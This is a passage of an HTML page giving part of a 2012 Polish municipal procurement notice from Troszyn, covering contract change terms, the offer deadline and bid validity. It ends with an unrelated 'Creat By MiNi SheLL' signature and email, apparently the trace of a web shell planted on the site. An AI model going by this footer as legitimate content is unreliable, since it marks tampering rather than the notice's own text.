VAT jeszcze nie wykonano.
3) zakresu rzeczowo-finansowego zamówienia w przypadku wystąpienia obiektywnych
okoliczności skutkujących koniecznością zmiany w trakcie realizacji umowy zakresu
rzeczowo-finansowego robót,
4) forma zabezpieczenia należytego wykonania umowy- zgodnie z art. 149 ust 1 u.p.z.p..

Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.troszyn.asi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gmniny w Troszynie
ul. Słowackiego 13
07-405 Troszyn
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2012 godzina 10:00, miejsce: Urząd Gmniny w Troszynie
ul. Słowackiego 13
07-405 Troszyn
/sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com